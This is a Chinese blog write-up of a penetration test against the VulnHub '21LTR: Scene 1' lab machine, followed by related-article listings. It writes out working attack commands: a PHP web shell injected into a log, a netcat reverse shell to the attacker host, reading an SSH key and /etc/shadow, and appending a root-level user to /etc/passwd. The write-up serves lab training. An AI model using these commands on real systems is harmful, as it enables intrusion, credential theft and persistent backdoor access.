21LTR-Scene靶机渗透测试

最新推荐文章于 2024-09-06 15:30:00 发布
最新推荐文章于 2024-09-06 15:30:00 发布
阅读量423 收藏 10
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140806950
版权

一、靶机下载地址

https://www.vulnhub.com/entry/21ltr-scene-1,3/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.2.0/24 -sn | grep -B 2 '00:0C:29:40:D8:78'

2、端口扫描

# 使用命令
nmap 192.168.2.120 -p- -A

3、目录扫描

# 使用命令
dirb http://192.168.2.120

三、获取shell

1、访问靶机IP地址

2、右击,查看页面源代码发现账号和密码

logs:zg]E-b0]+8:(58G

3、尝试使用ftp进行连接,发现连接成功

4、使用ls命令,发现backup_log.php文件

5、将文件下载下来并进行查看,可以看到它包含一个 PHP 程序,用于在目标系统上生成备份日志

# 使用命令
get backup_log.php /home/kali/Desktop/1.php

cat 1.php

6、既然是php的日志文件,那么可以考虑将一句话写入日志中getshell,参考了一下其他文档,需要利用10001端口

# 使用命令
nc -nv 192.168.2.120 10001

# 写入木马
<?php system($_GET['cmd']) ?>

7、访问http://192.168.2.120/logs/backup_log.php,执行whoami命令,发现执行成功

8、现在我们将尝试使用 netcat 在本地机器上获取反向 shell

# 使用命令
nc -e /bin/sh 192.168.2.128 443

# 攻击机监听
nc -lvnp 443

四、提权

1、因为有ssh服务,所以就读取一下密钥,并将读取到的内容保存到kali中

# 使用命令
cat /media/USB_1/Stuff/Keys/id_rsa

cat id_rsa

2、赋予权限,然后使用ssh进行登录

# 使用命令
chmod 600 id_rsa

ssh -i id_rsa hbeale@192.168.2.120

3、读取shadow文件

# 使用命令
sudo cat /etc/shadow

4、将root用户的密码写入到passwort.txt中,然后进行破解,成功破解出密码formula1

5、使用ssh连接root,发现权限被拒绝

# 使用命令
ssh root@192.168.2.120

6、那么只能写入高权限用户了、使用openssl命令生成密码

# 使用命令
openssl passwd 123456

7、使用echo命令将sdsd用户写入到/etc/passwd文件中

# 使用命令
echo 'sdsd:$1$4ldeNKAb$acub46AxdAf2RRZrnag8Z/:0:0:root:/root:/bin/bash' >> /etc/passwd

8、使用su命令切换到sdsd用户,发现提权成功

# 使用命令
su sdsd

果冻*果冻*
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 720
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21ltr-scene-1靶机
m0_65285254的博客
07-31 295
根据靶机描述,该靶机静态ip地址为192.168.2.120。因为之前扫描到ftp,ssh端口开放,使用该密码分别进行连接。ls查看文件,发现 backup_log.php 文件。利用/etc/passwd可写提权,写入用户到该文件中。访问/logs/backup_log.php 成功。按照格式将其echo到文件/etc/passwd中。扫描开放的全端口 开放21,22,80端口。当在网页上拼接访问logs时,访问被拒绝。将其下载到本地,在kali上查看内容。没发现什么功能点,对其进行目录扫描。
Vulnhub靶机 21 LTR-Scene1(渗透测试详细)
2301_78721909的博客
07-30 370
Vulnhub靶机 21 LTR-Scene1详解(from wuhu)
21LTR: Scene 1靶机
m0_61995767的博客
07-30 571
21LTR: Scene 1打靶记录
21LTR-Scene打靶渗透【附POC】(权限提升)
weixin_52487093的博客
07-31 395
21LTR-Scene打靶渗透【附POC】(权限提升)
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 375
21LTR:Scene1靶机,打靶文章
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 414
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 405
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
渗透测试】常用工具总结
m0_52923241的博客
03-01 6513
靶机笔记——常用工具篇 POP3:电子邮件协议 Hydra:暴力破解工具 简介 Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。 目前该工具支持以下协议的爆破: AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-P
LTR-303ALS-01.zip
09-24
《LTR-303ALS-01亮度传感器驱动程序详解》 在电子工程领域,传感器是一种至关重要的组件,它们能够将环境中的物理量转化为可读的电信号。LTR-303ALS-01是一款专门用于检测环境亮度的传感器,广泛应用于智能家居、...
LTR-C5040XXXXrohs_F.PDF
11-18
首先,我们可以看到该测试报告是关于 LTR-C5040XXXXrohs_F 的测试结果,测试项目包括 RoHS 指令(EU)2015/863 amending Annex II to Directive 2011/65/EU 中指定的有害物质测试。 其次,从测试结果中我们可以看到...
LTR-578ALS_Spec & Design Guides_V1.3.pdf
04-07
LTR-578ALS is a 3-in-1 sensor module, digital light sensor (ALS) + proximity sensor (PS) + built-in IR LED (940nm) with direct I2C interface, in a miniature chipled lead-free surface mount package ...
光感规格书LTR-303ALS(MTK和RK等平台)
09-26
根据给定的文件信息,我们可以总结出关于光感规格书LTR-303ALS的关键知识点。 ### 一、产品概述 #### 1.1 产品基本信息 - **名称**:LTR-303ALS-01 - **类型**:低电压I²C数字光传感器(ALS) - **封装形式**:低...
LTR-558ALS DS
10-03
The LTR-558ALS-WA is an integrated low voltage I2C digital light sensor [ALS] and proximity sensor [PS] with built-in emitter, in a single miniature chipled lead-free surface mount package
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1116
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 273
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-06 762
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1618
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值